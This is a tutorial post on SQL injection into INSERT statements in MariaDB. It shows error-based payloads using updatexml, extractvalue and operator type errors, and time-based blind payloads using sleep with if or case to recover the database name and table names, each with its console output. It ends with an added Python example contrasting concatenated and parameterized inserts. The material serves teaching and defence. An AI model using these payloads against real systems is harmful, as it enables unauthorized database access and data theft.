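[SQL injection] INSERT error-based injection and time-based blind injection
阿新 • Published: 2020-11-25
The key to INSERT injection is constructing a closure inside a single field value.
INSERT error-based injection
The table used in the demonstrations: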
MariaDB [mysql]> desc test;
+--------+----------+------+-----+---------+-------+
| Field  | Type     | Null | Key | Default | Extra |
+--------+----------+------+-----+---------+-------+
| id     | int(10)  | YES  |     | NULL    |       |
| uname  | char(10) | YES  |     | NULL    |       |
| passwd | char(10) | YES  |     | NULL    |       |
+--------+----------+------+-----+---------+-------+
0x01: INSERT numeric error-based injection
MariaDB [mysql]> insert into test values(1 and updatexml(1,concat(0x7e,database(),0x7e),1),'2','3');
ERROR 1105 (HY000): XPATH syntax error: '~mysql~'
0x02: INSERT string error-based injection
Note: for the string type, the key is constructing a closure inside a single field value.
MariaDB [mysql]> insert into test values(1,'2' and updatexml(1,concat(0x7e,database(),0x7e),1) and '','3');
ERROR 1105 (HY000): XPATH syntax error: '~mysql~'
0x03: Using extractvalue in place of updatexml
MariaDB [mysql]> insert into test values(1,'2' and extractvalue(1,concat(0x7e,database())) and '','3');
ERROR 1105 (HY000): XPATH syntax error: '~mysql'
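0x04: Using bitwise operators to produce INSERT numeric error-based injection
The error occurs because 1 and the value of (select database()) are combined with a bitwise operator, but a character string cannot take part in a bitwise operation, so the error message reports which value has the wrong type. The same applies to the "&", "|" and "^" operators.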
MariaDB [mysql]> insert into test values(1 ^ (select database()),'2','3');
ERROR 1292 (22007): Truncated incorrect INTEGER value: 'mysql'
MariaDB [mysql]> insert into test values(1 | (select database()),'2','3');
ERROR 1292 (22007): Truncated incorrect INTEGER value: 'mysql'
MariaDB [mysql]> insert into test values(1 & (select database()),'2','3');
ERROR 1292 (22007): Truncated incorrect INTEGER value: 'mysql'
0x05: Using bitwise operators to produce INSERT string error-based injection
insert into test values(1,'1' & (select database()) & '','3');
ERROR 1292 (22007): Truncated incorrect INTEGER value: 'mysql'
0x06: Using arithmetic operators (+, -, %, /) to produce INSERT error-based injection. Bitwise, logical and arithmetic operators can be combined freely.
MariaDB [mysql]> insert into test values(1,'1' + (select database()) & '','3');
ERROR 1292 (22007): Truncated incorrect DOUBLE value: 'mysql'
MariaDB [mysql]> insert into test values(1,'1' - (select database()) and '','3');
ERROR 1292 (22007): Truncated incorrect DOUBLE value: 'mysql'
MariaDB [mysql]> insert into test values(1,'1' / (select database()) or '','3');
ERROR 1292 (22007): Truncated incorrect DOUBLE value: 'mysql'
MariaDB [mysql]> insert into test values(1,'1' % (select database()) & '','3');
ERROR 1292 (22007): Truncated incorrect DOUBLE value: 'mysql'
MariaDB [mysql]> insert into test values(1,'1' % (select database()) | '','3');
ERROR 1292 (22007): Truncated incorrect DOUBLE value: 'mysql'
MariaDB [mysql]> insert into test values(1,'1' % (select database()) / '','3');
ERROR 1292 (22007): Truncated incorrect DOUBLE value: 'mysql'
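INSERT time-based blind injection
Before studying time-based blind injection you need to know how to use the SQL constructs sleep(), if(), substr(), ascii() and case when.
0x07: A simple example
The original, normal statement: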
MariaDB [mysql]> insert into test values(1,('2'),'3');
Query OK, 1 row affected (0.005 sec)
MariaDB [mysql]> insert into test values(1,('1') and sleep(3) and (''),'3');
Query OK, 1 row affected, 1 warning (3.002 sec)
0x08: Guess the length of the current database name; if the length equals 5, the response is delayed by 3 seconds.
MariaDB [mysql]> insert into test values(1,('1') and sleep(if((select length(database()))=5,3,0)) and (''),'3');
Query OK, 1 row affected, 1 warning (3.007 sec)
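0x09: Guess the ASCII code of the first character of the first table name in the current database. Take the time to understand it; slow is fast.
The actual value: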
MariaDB [mysql]> select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1));
+---------------------------------------------------------------------------------------------------------------+
| ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)) |
+---------------------------------------------------------------------------------------------------------------+
| 112 |
+---------------------------------------------------------------------------------------------------------------+
1 row in set (0.000 sec)
The INSERT blind injection looks like this:
MariaDB [mysql]> insert into test values(1,('1') and sleep(if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=112,3,0)) and (''),'3');
Query OK, 1 row affected, 1 warning (3.005 sec)
0x10: Using case when in place of if():
MariaDB [mysql]> insert into test values(1,('2') and case when (select length(database())) = 5 then sleep(2) else 0 end and (''),'3');
Query OK, 1 row affected, 1 warning (2.002 sec)
MariaDB [mysql]> insert into test values(1,('2') and case when ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)) = 112 then sleep(2) else 0 end and (''),'3');
Query OK, 1 row affected, 1 warning (2.004 sec)
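The closure pattern used throughout this page, seen from the application side, as an added example that is not part of the original post: the same value is inserted once by string concatenation and once as a bound parameter. It assumes SQLite (via Python's sqlite3) instead of MariaDB, and probe() is a hypothetical function registered as a stand-in for updatexml()/sleep(), which SQLite does not have.

```python
import sqlite3

# Constructed input following the page's closure pattern  '2' and <expr> and ''.
# probe() is a hypothetical stand-in for updatexml()/sleep(), which SQLite lacks.
PAYLOAD = "2' and probe() and '"

def make_db():
    """In-memory table shaped like the page's `test`, plus a call recorder."""
    db = sqlite3.connect(":memory:")
    db.execute("create table test (id int, uname char(10), passwd char(10))")
    calls = []

    def probe():
        calls.append(1)  # record that the database executed the expression
        return 1

    db.create_function("probe", 0, probe)
    return db, calls

def insert_concatenated(db, uname):
    # Vulnerable: the value is spliced into the SQL text, so the quote inside
    # it ends the string literal and the remainder is parsed as an expression.
    db.execute("insert into test values(1,'" + uname + "','3')")

def insert_parameterized(db, uname):
    # Hardened: the statement text is fixed; the value is sent as bound data.
    db.execute("insert into test values(?,?,?)", (1, uname, "3"))

def run(insert):
    """Return (stored uname, whether probe() ran) for one insert style."""
    db, calls = make_db()
    insert(db, PAYLOAD)
    stored = db.execute("select uname from test").fetchone()[0]
    return stored, bool(calls)

if __name__ == "__main__":
    print("concatenated :", run(insert_concatenated))
    print("parameterized:", run(insert_parameterized))
```

With concatenation the database evaluates the expression and stores its boolean result; with a bound parameter the whole string is stored as data and probe() never runs.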